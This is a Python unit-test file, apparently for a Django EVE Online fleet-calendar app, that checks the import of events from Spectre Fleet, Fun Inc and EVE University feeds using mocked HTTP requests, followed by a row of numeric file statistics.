title="Spectre Fleet 1",
host=self.host,
doctrine="see details",
formup_system=EventImport.SPECTRE_FLEET,
description="Testing Eve Uni class 1",
start_time=published,
end_time=published,
fc=EventImport.SPECTRE_FLEET,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
self.assertTrue(Event.objects.filter(pk=original_event.pk).exists())
def test_should_delete_outdated_spectre_fleet_event(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse = lambda x: feedparser_parse("no-data")
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
published = utc.localize(dt.datetime(2021, 2, 3, 21, 0))
Event.objects.create(
operation_type=self.category,
title="Spectre Fleet OLD",
host=self.host,
doctrine="see details",
formup_system=EventImport.SPECTRE_FLEET,
description="Testing Eve Uni class OLD",
start_time=published,
end_time=published,
fc=EventImport.SPECTRE_FLEET,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_spectre_fleet_has_error(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse.side_effect = RuntimeError
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
########################
# fun inc only
def test_should_add_new_fun_inc_event(self, mock_feedparser, requests_mocker):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
obj = Event.objects.first()
self.assertEqual(obj.operation_type, self.category)
self.assertEqual(obj.title, "Fun Fleet 1")
self.assertEqual(obj.host, self.host)
self.assertEqual(obj.doctrine, "see details")
self.assertEqual(obj.formup_system, EventImport.FUN_INC)
self.assertEqual(obj.description, "Testing Fun Fleet 1")
self.assertEqual(obj.start_time, utc.localize(dt.datetime(2021, 2, 5, 22, 0)))
self.assertEqual(obj.end_time, utc.localize(dt.datetime(2021, 2, 5, 23, 0)))
self.assertEqual(obj.fc, EventImport.FUN_INC)
self.assertEqual(obj.visibility, Event.VISIBILITY_EXTERNAL)
self.assertEqual(obj.user, self.user)
self.assertEqual(obj.eve_character, self.eve_character)
def test_should_add_new_fun_inc_event_no_character(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertTrue(Event.objects.filter(title="Fun Fleet 1").exists())
def test_should_not_replace_existing_fun_inc_event(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
original_event = Event.objects.create(
operation_type=self.category,
title="Fun Fleet 1",
host=self.host,
doctrine="see details",
formup_system=EventImport.FUN_INC,
description="Testing Fun Fleet 1",
start_time=utc.localize(dt.datetime(2021, 2, 5, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 5, 23, 0)),
fc=EventImport.FUN_INC,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
self.assertTrue(Event.objects.filter(pk=original_event.pk).exists())
def test_should_delete_outdated_fun_inc_event(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("no-data"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
Event.objects.create(
operation_type=self.category,
title="Fun Fleet OLD",
host=self.host,
doctrine="see details",
formup_system=EventImport.FUN_INC,
description="Testing Fun Fleet OLD",
start_time=utc.localize(dt.datetime(2021, 2, 4, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 4, 23, 0)),
fc=EventImport.FUN_INC,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_fun_inc_calendar_is_invalid(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text="",
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_fun_inc_calendar_request_has_error(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
exc=requests.exceptions.ConnectTimeout,
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
########################
# eve uni only
def test_should_add_new_eve_uni_event(self, mock_feedparser, requests_mocker):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
obj = Event.objects.first()
self.assertEqual(obj.operation_type, self.category)
self.assertEqual(obj.title, "Eve Uni class 1")
self.assertEqual(obj.host, self.host)
self.assertEqual(obj.doctrine, "see details")
self.assertEqual(obj.formup_system, EventImport.EVE_UNIVERSITY)
self.assertEqual(obj.description, "Testing Eve Uni class 1")
self.assertEqual(obj.start_time, utc.localize(dt.datetime(2021, 2, 4, 22, 0)))
self.assertEqual(obj.end_time, utc.localize(dt.datetime(2021, 2, 4, 23, 0)))
self.assertEqual(obj.fc, EventImport.EVE_UNIVERSITY)
self.assertEqual(obj.visibility, Event.VISIBILITY_EXTERNAL)
self.assertEqual(obj.user, self.user)
self.assertEqual(obj.eve_character, self.eve_character)
def test_should_add_new_eve_uni_event_no_character(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertTrue(Event.objects.filter(title="Eve Uni class 1").exists())
def test_should_not_replace_existing_eve_uni_event(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
original_event = Event.objects.create(
operation_type=self.category,
title="Eve Uni class 1",
host=self.host,
doctrine="see details",
formup_system=EventImport.EVE_UNIVERSITY,
description="Testing Eve Uni class 1",
start_time=utc.localize(dt.datetime(2021, 2, 4, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 4, 23, 0)),
fc=EventImport.EVE_UNIVERSITY,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
self.assertTrue(Event.objects.filter(pk=original_event.pk).exists())
def test_should_delete_outdated_eve_uni_events(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("no-data"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
Event.objects.create(
operation_type=self.category,
title="Eve Uni class OLD",
host=self.host,
doctrine="see details",
formup_system=EventImport.EVE_UNIVERSITY,
description="Testing Eve Uni class OLD",
start_time=utc.localize(dt.datetime(2021, 2, 3, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 3, 23, 0)),
fc=EventImport.EVE_UNIVERSITY,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_eve_uni_request_has_error(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
exc=requests.exceptions.ConnectTimeout,
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_eve_uni_calendar_is_invalid(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET", url="https://portal.eveuniversity.org/api/getcalendar", text=""
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
########################
# multiple fleet types
def test_should_add_fleet_events_all_types(self, mock_feedparser, requests_mocker):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 3)
self.assertTrue(Event.objects.filter(title="Spectre Fleet 1").exists())
self.assertTrue(Event.objects.filter(title="Fun Fleet 1").exists())
self.assertTrue(Event.objects.filter(title="Eve Uni class 1").exists())
| 36.939671 | 166 | 0.619717 | 2,158 | 20,206 | 5.592215 | 0.075533 | 0.052701 | 0.053696 | 0.060076 | 0.929897 | 0.920948 | 0.907027 | 0.899486 | 0.889045 | 0.868578 | 0 | 0.027476 | 0.279521 | 20,206 | 546 | 167 | 37.007326 | 0.801484 | 0.01752 | 0 | 0.738462 | 0 | 0.015385 | 0.103468 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.041758 | false | 0 | 0.191209 | 0 | 0.235165 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
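The Spectre Fleet tests above swap in a canned parser with `mock_feedparser.parse = feedparser_parse` so no network call is made. A stdlib-only sketch of that stubbing pattern (the `fetch_titles`/`fake_parse` names are illustrative stand-ins, not part of the app under test):

```python
import types

def fetch_titles(parser):
    """Illustrative consumer: pull entry titles from whatever the parser returns."""
    feed = parser.parse("https://example.org/feed")
    return [entry["title"] for entry in feed["entries"]]

def fake_parse(url):
    # Canned payload standing in for a live RSS response, in the spirit of
    # the feedparser_parse fixture from testdata.
    return {"entries": [{"title": "Spectre Fleet 1"}]}

# Swap the stub in the same way the tests reassign mock_feedparser.parse.
stub = types.SimpleNamespace(parse=fake_parse)
titles = fetch_titles(stub)
```

Because the consumer only depends on the parser's `parse` callable, any object exposing that attribute can stand in for the real `feedparser` module.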
f7a3275ad6269ffd8dca8b5d6b47b271034fabe8 | 11,222 | py | Python | ext/ANTsPyNet/antspynet/architectures/create_vgg_model.py | tsmonteiro/fmri_proc | ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1 | [
"MIT"
] | 2 | 2021-11-16T10:00:33.000Z | 2021-12-13T02:57:40.000Z | ext/ANTsPyNet/antspynet/architectures/create_vgg_model.py | tsmonteiro/fmri_proc | ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1 | [
"MIT"
] | null | null | null | ext/ANTsPyNet/antspynet/architectures/create_vgg_model.py | tsmonteiro/fmri_proc | ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1 | [
"MIT"
] | 1 | 2021-12-13T02:57:27.000Z | 2021-12-13T02:57:27.000Z |
from keras.models import Model
from keras.layers import (Input, Flatten, Dense, Dropout,
                          Conv2D, Conv2DTranspose, MaxPooling2D,
                          ZeroPadding2D,
                          Conv3D, Conv3DTranspose, MaxPooling3D,
                          ZeroPadding3D)
def create_vgg_model_2d(input_image_size,
number_of_classification_labels=1000,
layers=(1, 2, 3, 4, 4),
lowest_resolution=64,
convolution_kernel_size=(3, 3),
pool_size=(2, 2),
strides=(2, 2),
number_of_dense_units=4096,
dropout_rate=0.0,
style=19,
mode='classification'):
"""
2-D implementation of the Vgg deep learning architecture.
Creates a keras model of the Vgg deep learning architecture for image
recognition based on the paper
K. Simonyan and A. Zisserman, Very Deep Convolutional Networks for
Large-Scale Image Recognition
available here:
https://arxiv.org/abs/1409.1556
This particular implementation was influenced by the following python
implementation:
https://gist.github.com/baraldilorenzo/8d096f48a1be4a2d660d
Arguments
---------
input_image_size : tuple of length 3
Used for specifying the input tensor shape. The shape (or dimension) of
that tensor is the image dimensions followed by the number of channels
(e.g., red, green, and blue).
number_of_classification_labels : integer
Number of classification labels.
layers : tuple
A tuple determining the number of 'filters' defined for each layer.
lowest_resolution : integer
Number of filters at the beginning.
convolution_kernel_size : tuple
2-d vector defining the kernel size during the encoding path.
pool_size : tuple
2-d vector defining the region for each pooling layer.
strides : tuple
2-d vector describing the stride length in each direction.
number_of_dense_units : integer
Number of units in the last layers.
dropout_rate : scalar
Between 0 and 1 to use between dense layers.
style : integer
'16' or '19' for VGG16 or VGG19, respectively.
mode : string
'classification' or 'regression'. Default = 'classification'.
Returns
-------
Keras model
A 2-D Keras model defining the network.
Example
-------
>>> model = create_vgg_model_2d((128, 128, 1))
>>> model.summary()
"""
if style != 16 and style != 19:
raise ValueError("Incorrect style. Must be either '16' or '19'.")
inputs = Input(shape=input_image_size)
outputs = None
for i in range(len(layers)):
number_of_filters = lowest_resolution * 2**(layers[i] - 1)
if i == 0:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(inputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
elif i == 1:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
else:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
if style == 19:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = MaxPooling2D(pool_size=pool_size,
strides=strides)(outputs)
outputs = Flatten()(outputs)
outputs = Dense(units=number_of_dense_units,
activation='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
outputs = Dense(units=number_of_dense_units,
activation='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
layer_activation = ''
if mode == 'classification':
layer_activation = 'softmax'
elif mode == 'regression':
layer_activation = 'linear'
else:
raise ValueError('unrecognized mode.')
outputs = Dense(units=number_of_classification_labels,
activation=layer_activation)(outputs)
vgg_model = Model(inputs=inputs, outputs=outputs)
return vgg_model
def create_vgg_model_3d(input_image_size,
number_of_classification_labels=1000,
layers=(1, 2, 3, 4, 4),
lowest_resolution=64,
convolution_kernel_size=(3, 3, 3),
pool_size=(2, 2, 2),
strides=(2, 2, 2),
number_of_dense_units=4096,
dropout_rate=0.0,
style=19,
mode='classification'):
"""
3-D implementation of the Vgg deep learning architecture.
Creates a keras model of the Vgg deep learning architecture for image
recognition based on the paper
K. Simonyan and A. Zisserman, Very Deep Convolutional Networks for
Large-Scale Image Recognition
available here:
https://arxiv.org/abs/1409.1556
This particular implementation was influenced by the following python
implementation:
https://gist.github.com/baraldilorenzo/8d096f48a1be4a2d660d
Arguments
---------
input_image_size : tuple of length 4
Used for specifying the input tensor shape. The shape (or dimension) of
that tensor is the image dimensions followed by the number of channels
(e.g., red, green, and blue).
number_of_classification_labels : integer
Number of classification labels.
layers : tuple
A tuple determining the number of 'filters' defined for each layer.
lowest_resolution : integer
Number of filters at the beginning.
convolution_kernel_size : tuple
3-d vector defining the kernel size during the encoding path.
pool_size : tuple
3-d vector defining the region for each pooling layer.
strides : tuple
3-d vector describing the stride length in each direction.
number_of_dense_units : integer
Number of units in the last layers.
dropout_rate : scalar
Between 0 and 1 to use between dense layers.
style : integer
'16' or '19' for VGG16 or VGG19, respectively.
mode : string
'classification' or 'regression'. Default = 'classification'.
Returns
-------
Keras model
A 3-D Keras model defining the network.
Example
-------
>>> model = create_vgg_model_3d((128, 128, 128, 1))
>>> model.summary()
"""
if style != 16 and style != 19:
raise ValueError("Incorrect style. Must be either '16' or '19'.")
inputs = Input(shape=input_image_size)
outputs = None
for i in range(len(layers)):
number_of_filters = lowest_resolution * 2**(layers[i] - 1)
if i == 0:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(inputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
elif i == 1:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
else:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
if style == 19:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = MaxPooling3D(pool_size=pool_size,
strides=strides)(outputs)
outputs = Flatten()(outputs)
outputs = Dense(units=number_of_dense_units,
activation='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
outputs = Dense(units=number_of_dense_units,
activation='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
layer_activation = ''
if mode == 'classification':
layer_activation = 'softmax'
elif mode == 'regression':
layer_activation = 'linear'
else:
raise ValueError('unrecognized mode.')
outputs = Dense(units=number_of_classification_labels,
activation=layer_activation)(outputs)
vgg_model = Model(inputs=inputs, outputs=outputs)
return vgg_model
| 35.853035 | 80 | 0.556764 | 1,132 | 11,222 | 5.348057 | 0.150177 | 0.055501 | 0.054509 | 0.058143 | 0.961513 | 0.958209 | 0.954741 | 0.954741 | 0.954741 | 0.954741 | 0 | 0.029246 | 0.366245 | 11,222 | 312 | 81 | 35.967949 | 0.821991 | 0.297095 | 0 | 0.897436 | 0 | 0 | 0.049807 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.012821 | 0 | 0.025641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
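In both VGG builders above, the filter count for block `i` is `lowest_resolution * 2**(layers[i] - 1)`, producing the characteristic VGG doubling schedule. A dependency-free sketch of that schedule for the default arguments (the helper name is illustrative, not part of the package):

```python
def vgg_filter_schedule(layers=(1, 2, 3, 4, 4), lowest_resolution=64):
    """Per-block filter counts, mirroring number_of_filters in the builders."""
    return [lowest_resolution * 2 ** (layer - 1) for layer in layers]

# Default VGG-16/19 configuration: filters double until they cap at 512.
schedule = vgg_filter_schedule()
```

With the defaults this yields `[64, 128, 256, 512, 512]`, matching the filter widths in the original VGG paper.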
f7c511c8618362d12338518c3015a42a1bcae977 | 6,123 | py | Python | tests/func/strands/test_create_strand.py | StrandHQ/strand-api | afa2da651ef9046ea39c044a65bdd88d814838b4 | [
"MIT"
] | 1 | 2018-10-23T16:02:54.000Z | 2018-10-23T16:02:54.000Z | tests/func/strands/test_create_strand.py | StrandHQ/strand-api | afa2da651ef9046ea39c044a65bdd88d814838b4 | [
"MIT"
] | 3 | 2020-06-05T18:21:51.000Z | 2021-06-10T20:25:15.000Z | tests/func/strands/test_create_strand.py | tadasant/strand-api | afa2da651ef9046ea39c044a65bdd88d814838b4 | [
"MIT"
] | null | null | null | import pytest
from tests.resources.MutationGenerator import MutationGenerator
class TestCreateStrand:
# TODO: Break out creating strands as superuser vs regular user after v0.3
@pytest.mark.django_db
def test_unauthenticated(self, client, strand_factory, user_factory, team_factory):
saver = user_factory()
owner = team_factory()
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=saver.id,
owner_id=owner.id)
response = client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert not response.json()['data']['createStrand']
assert response.json()['errors'][0]['message'] == 'Unauthorized'
@pytest.mark.django_db
def test_invalid_saver(self, superuser_client, user_factory, team_factory, strand_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id + 1,
owner_id=owner.id)
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert not response.json()['data']['createStrand']
assert response.json()['errors'][0]['message'] == str({'saver_id':
[f'Invalid pk "{jimmy.id + 1}" '
f'- object does not exist.']
})
@pytest.mark.django_db
def test_invalid_owner(self, superuser_client, user_factory, team_factory, strand_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id + 1)
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert not response.json()['data']['createStrand']
assert response.json()['errors'][0]['message'] == str({'owner_id':
[f'Invalid pk "{owner.id + 1}" '
f'- object does not exist.']
})
@pytest.mark.django_db
def test_valid_add_existing_tags(self, superuser_client, user_factory, team_factory, strand_factory, tag_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id,
tags=[tag_factory().name, tag_factory().name])
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert response.json()['data']['createStrand']['strand']['title']
assert len(response.json()['data']['createStrand']['strand']['tags']) == 2
@pytest.mark.django_db
def test_valid_create_new_tags(self, superuser_client, user_factory, team_factory, strand_factory, tag_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=strand.title,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id,
tags=[tag_factory.build().name, tag_factory.build().name])
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert response.json()['data']['createStrand']['strand']['title']
assert len(response.json()['data']['createStrand']['strand']['tags']) == 2
@pytest.mark.django_db
def test_valid_no_title(self, superuser_client, user_factory, team_factory, strand_factory):
jimmy = user_factory()
owner = team_factory(members=[jimmy])
strand = strand_factory.build()
mutation = MutationGenerator.create_strand(title=None,
body=strand.body,
timestamp=strand.timestamp,
saver_id=jimmy.id,
owner_id=owner.id)
response = superuser_client.post('/graphql', {'query': mutation})
assert response.status_code == 200, response.content
assert response.json()['data']['createStrand']['strand']['body']
| 52.333333 | 118 | 0.501552 | 532 | 6,123 | 5.584586 | 0.148496 | 0.032986 | 0.033322 | 0.075395 | 0.878492 | 0.869404 | 0.852911 | 0.838102 | 0.838102 | 0.838102 | 0 | 0.00788 | 0.398987 | 6,123 | 116 | 119 | 52.784483 | 0.799457 | 0.011759 | 0 | 0.744681 | 0 | 0 | 0.070921 | 0 | 0 | 0 | 0 | 0.008621 | 0.180851 | 1 | 0.06383 | false | 0 | 0.021277 | 0 | 0.095745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
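Every negative test in the file above repeats one assertion pattern: POST the mutation, then check that `data.createStrand` is empty and that `errors[0].message` matches. A minimal standalone sketch of that check — the helper name and the inline payload are hypothetical, not part of the repo:

```python
def assert_graphql_error(payload, message):
    """Assert a GraphQL response carries no createStrand data and the expected error."""
    assert not payload['data']['createStrand']
    assert payload['errors'][0]['message'] == message

# Shape mirrors response.json() in the tests above.
payload = {'data': {'createStrand': None},
           'errors': [{'message': 'Unauthorized'}]}
assert_graphql_error(payload, 'Unauthorized')
```

Factoring the pair of asserts into such a helper would also make the `test_invalid_saver` / `test_invalid_owner` twins one-liners apart from the mutation they build.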
f7dd23cbc8f70e7e69469880804d12898c890cc4 | 5,519 | py | Python | shared/small_roots/ernst.py | jvdsn/crypto-attacks | df37f112c28687efd105b7770b1baa4c53a71ad8 | [
"MIT"
] | 139 | 2020-10-26T00:43:15.000Z | 2022-03-28T20:00:46.000Z | shared/small_roots/ernst.py | jvdsn/crypto-attacks | df37f112c28687efd105b7770b1baa4c53a71ad8 | [
"MIT"
] | 6 | 2021-06-21T05:59:04.000Z | 2022-02-17T22:50:42.000Z | shared/small_roots/ernst.py | jvdsn/crypto-attacks | df37f112c28687efd105b7770b1baa4c53a71ad8 | [
"MIT"
] | 22 | 2021-07-01T08:42:54.000Z | 2022-03-20T20:27:18.000Z | import logging
from math import gcd
from sage.all import RR
from sage.all import ZZ
from shared import small_roots
def integer_trivariate_1(f, m, t, W, X, Y, Z, check_bounds=True, roots_method="resultants"):
"""
Computes small integer roots of a trivariate polynomial.
More information: Ernst M. et al., "Partial Key Exposure Attacks on RSA Up to Full Size Exponents" (Section 4.1.1)
:param f: the polynomial
:param m: the parameter m
:param t: the parameter t
:param W: the parameter W
:param X: an approximate bound on the x roots
:param Y: an approximate bound on the y roots
:param Z: an approximate bound on the z roots
:param check_bounds: whether or not we should check bounds (default: True)
:param roots_method: the method to use to find roots (default: "resultants")
    :return: a generator yielding small roots (tuples of x, y, and z roots) of the polynomial
"""
pr = f.parent()
x, y, z = pr.gens()
tau = t / m
if check_bounds and RR(X) ** (1 + 3 * tau) * RR(Y) ** (2 + 3 * tau) * RR(Z) ** (1 + 3 * tau + 3 * tau ** 2) > RR(W) ** (1 + 3 * tau):
logging.debug(f"Bound check failed for m = {m}, t = {t}")
return
R = f.constant_coefficient()
while gcd(R, X) != 1:
X += 1
while gcd(R, Y) != 1:
Y += 1
while gcd(R, Z) != 1:
Z += 1
while gcd(R, W) != 1:
W += 1
n = (X * Y) ** m * Z ** (m + t) * W
assert gcd(R, n) == 1
